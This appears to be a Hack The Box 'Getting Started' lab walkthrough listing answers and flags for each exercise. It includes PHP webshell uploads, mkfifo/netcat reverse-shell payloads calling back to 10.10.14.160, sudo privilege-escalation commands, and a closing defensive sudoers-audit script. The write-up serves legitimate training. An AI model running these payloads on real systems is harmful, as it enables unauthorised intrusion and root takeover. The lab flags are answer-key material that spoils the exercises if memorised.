Getting Started

Basic Tools

Apply what you learned in this section to grab the banner of the above server and submit it as the answer.

SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.1

Service Scanning

Perform an Nmap scan of the target. What does Nmap display as the version of the service running on port 8080?

Apache Tomcat

Perform an Nmap scan of the target and identify the non-default port that the telnet service is running on.

2323

List the SMB shares available on the target host. Connect to the available share as the bob user. Once connected, access the folder called ‘flag’ and submit the contents of the flag.txt file.

dceece590f3284c3866305eb2473d099

The guest user does not have permission to list the directory. Let's try the user bob with the password Welcome1.

Now we enter the flag directory, list its contents and download the file flag.txt.

Now it's easy: just exit the SMB session and display the contents of the file.

Web Enumeration

Try running some of the web enumeration techniques you learned in this section on the server above, and use the info you get to get the flag.

gobuster dir -u http://83.136.255.10:34364 -w /usr/share/dirb/wordlists/common.txt

Then I opened the link found by gobuster.

But when I clicked Continue, nothing happened, so I started searching for other files.

When I looked at the page source, I found the login and the password: admin:password123

HTB{w3b_3num3r4710n_r3v34l5_53cr375}

Public Exploits

First, we run nmap to discover the open ports and what is running on each of them.

We discovered an HTTP service running on port 33997, so let's open it in the browser.

Now we know that it's running WordPress version 2.7.10. Let's search for an exploit for it.

Now that we know of some exploits we can use, let's open Metasploit.

HTB{my_f1r57_h4ck}

Privilege Escalation

SSH into the server above with the provided credentials, and use the ‘-p xxxxxx’ to specify the port shown above. Once you login, try to find a way to move to ‘user2’, to get the flag in ‘/home/user2/flag.txt’.

First we need to connect to the target.

Now we want to see which commands we can execute with sudo. We learn that we can run bash as user2 without a password, so we do exactly that.

Now that’s easy. We just need to read the file.

HTB{l473r4l_m0v3m3n7_70_4n07h3r_u53r}

Once you gain access to ‘user2’, try to find a way to escalate your privileges to root, to get the flag in ‘/root/flag.txt’.

Listing the contents of the /root directory, we saw a hidden directory (.ssh). Exploring it, we found an SSH key.

Now it's easy: we just copy its contents to our machine.

And use it to log in to the server as root without a password. Now we have permission to read the file.

HTB{pr1v1l363_35c4l4710n_2_r007}

Nibbles – Enumeration

Run an nmap script scan on the target. What is the Apache version running on the server? (answer format: X.X.XX)

2.4.18

Nibbles – Initial Foothold

Gain a foothold on the target and submit the user.txt flag

Let’s scan the server with nmap.

Now that we see port 80 is open, let's access it in the browser.

But we didn't find anything useful, so let's scan with gobuster to find hidden directories or pages.

We found some addresses; now let's look at them.

Nothing interesting here either, so we continue searching for directories and files.

Now we have the admin page and the username, but still no password. Let's try the name nibbles as the password. And… we are in. 😀

Now we want to use the My Image plugin to inject a command, so click the Plugins tab.

Create a local file and copy the code below into it.

<?php system('id'); ?>

Click the Configure option and choose the file you created. A lot of errors are shown, but the file was uploaded.

When we executed Gobuster, we found a directory called content.

Our script works :D.

Now we can change the script to get a reverse shell.

<?php system ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.160 9443 >/tmp/f"); ?>

Upload the file again and use Netcat to listen on this port.

nc -lvnp 9443

Open the file in the browser again and go to your terminal. Change to the directory /home/nibbler/, where you will find the file with the flag.

79c03865431abf47b90ef24b9695e148

Nibbles – Privilege Escalation

Escalate privileges and submit the root.txt flag.

Now that we are inside the machine, we need a better terminal. Type the command below and press Enter, then change to the directory /home/nibbler and unzip the file.

python3 -c 'import pty; pty.spawn("/bin/bash")'
cd /home/nibbler
unzip personal.zip

Now we have a script, but let's run a scan of the system first. For this we use LinEnum.sh. Download the script and start a web server on your machine.

python3 -m http.server 8080

And download the file on the target machine.

wget http://10.10.14.160:8080/LinEnum.sh

Make the file executable and run it.

chmod +x LinEnum.sh
./LinEnum.sh

The nibbler user can run the file /home/nibbler/personal/stuff/monitor.sh with root privileges without a password.

Add the command below to monitor.sh:

echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.160 8443 >/tmp/f' | tee -a monitor.sh

Start Netcat in another tab.

nc -lvnp 8443

And execute the script with sudo.

sudo ./monitor.sh

Go to the other tab and look: you are logged in as root. To finish the lab, just read the contents of the file.

cat /root/root.txt

de5e5d6619862a8aa5b9b212314e0cdd

Knowledge Check

Spawn the target, gain a foothold and submit the contents of the user.txt flag.

First, we need to scan the target.

Looking at the file robots.txt, we found a new directory.

We already know that the application running on port 80 is GetSimple CMS, so let's search for vulnerabilities.

But we don’t know what version is running.

Let’s go back to the address http://10.129.42.249 and look for something interesting.

Back on the homepage, notice towards the top of the page the mention of GetSimple CMS Documentation. Let’s visit this page and see if we can find clues towards our next step.

Starting at the GetSimple Basics page, we can get an idea of how the tool works. Since we need to try and get user data to log into the admin portal, let’s visit data as the wiki notes…

/data: this is where the user-generated data is stored.

Looking through the files in this directory, we found the admin password hash.

http://10.129.42.249/data/users/admin.xml

But we need to crack this hash first.

Great!!! We are inside the system 😀

Clicking Support, we discovered that the system version is 3.3.15.

We can't upload any files yet, so let's look at the Theme tab, where we found a way to edit the themes.

Put the code below inside the theme and save it.

<?php system('id'); ?>

Go back to the initial page.

And… it worked!!! 😀

Now it's time to get a reverse shell.

<?php system ("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.160 4444 >/tmp/f"); ?>

Start Netcat on your terminal, save the reverse shell and open the page.

If you want to improve your terminal, run the command below.

python3 -c 'import pty; pty.spawn("/bin/bash")'

Searching in the system, we found the flag in /home/mr3b/user.txt.

7002d65b149b0a4d19132a66feed21d8

After obtaining a foothold on the target, escalate privileges to root and submit the contents of the root.txt flag.

First, let’s run the LinEnum.sh script mentioned in the Privilege Escalation section of this module and get this file into our new target.

Note that if you need to get this file again, simply visit https://github.com/rebootuser/LinEnum.git to copy the script onto your local machine.

Start a web server in the directory where you downloaded the file.

python -m http.server 8080

Download the file on the target.

wget http://10.10.14.160:8080/LinEnum.sh

Make the file executable and run it.

Note that there is a command you can run as root without a password.

Now it’s easy. Below is the command to start a new connection as root.

CMD="/bin/sh"
sudo /usr/bin/php -r "system('$CMD');"

Go to the root directory and get the flag.

f1fba6e9f71efb2630e6e34da6387842
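The Nibbles escalation (a NOPASSWD sudo rule for a script the user can edit) and the Knowledge Check escalation (a NOPASSWD rule for the php interpreter) are the two sudoers mistakes LinEnum surfaced. The audit below is an added example written from the administrator's side, not code from the writeup or from LinEnum; the sudoers text is constructed, the user names are placeholders, and it assumes rules in the common "user HOST=(runas) [TAG:] command" form.

```python
import os
import re
import stat
from typing import Callable, Dict, List

# Matches the common "user HOST=(runas) [TAG:] command[, command]" sudoers form (assumption).
LINE_RE = re.compile(r"^(?P<user>\S+)\s+\S+=\((?P<runas>[^)]*)\)\s+(?P<tags>(?:\w+:\s*)*)(?P<cmds>.+)$")

# Programs that hand the caller a shell or arbitrary code execution when run as root.
INTERPRETERS = {"php", "python", "python3", "perl", "ruby", "bash", "sh", "vim", "awk", "find"}

def is_writable_by_others(path: str) -> bool:
    """True if the command file is group/world-writable or does not exist (so it could be planted)."""
    try:
        st = os.stat(path)
    except FileNotFoundError:
        return True
    return bool(st.st_mode & (stat.S_IWGRP | stat.S_IWOTH))

def audit_sudoers(text: str, writable: Callable[[str], bool] = is_writable_by_others) -> List[Dict[str, str]]:
    """Return one finding per NOPASSWD command that is a shell/interpreter or a writable file."""
    findings = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()          # drop comments and blank lines
        m = LINE_RE.match(line)
        if not m or "NOPASSWD" not in m.group("tags").upper():
            continue
        user, runas = m.group("user"), m.group("runas")
        for cmd in m.group("cmds").split(","):
            parts = cmd.split()
            if not parts:
                continue
            prog = parts[0]                           # command path without its arguments
            if prog == "ALL" or os.path.basename(prog) in INTERPRETERS:
                findings.append({"user": user, "cmd": prog, "reason": f"shell/interpreter as {runas}"})
            elif writable(prog):
                findings.append({"user": user, "cmd": prog, "reason": "writable target"})
    return findings

# Constructed sudoers content modelled on the two findings in this writeup (user names are placeholders).
SAMPLE_SUDOERS = """\
root    ALL=(ALL:ALL) ALL
nibbler ALL=(root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
webuser ALL=(ALL) NOPASSWD: /usr/bin/php
user1   ALL=(user2) NOPASSWD: /bin/bash
"""

if __name__ == "__main__":
    for finding in audit_sudoers(SAMPLE_SUDOERS, writable=lambda p: p.endswith("monitor.sh")):
        print(finding)
```

The writable check is injectable so the sample can be audited on a machine where those paths do not exist; on a real host, run it with the default and the /etc/sudoers and /etc/sudoers.d contents.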
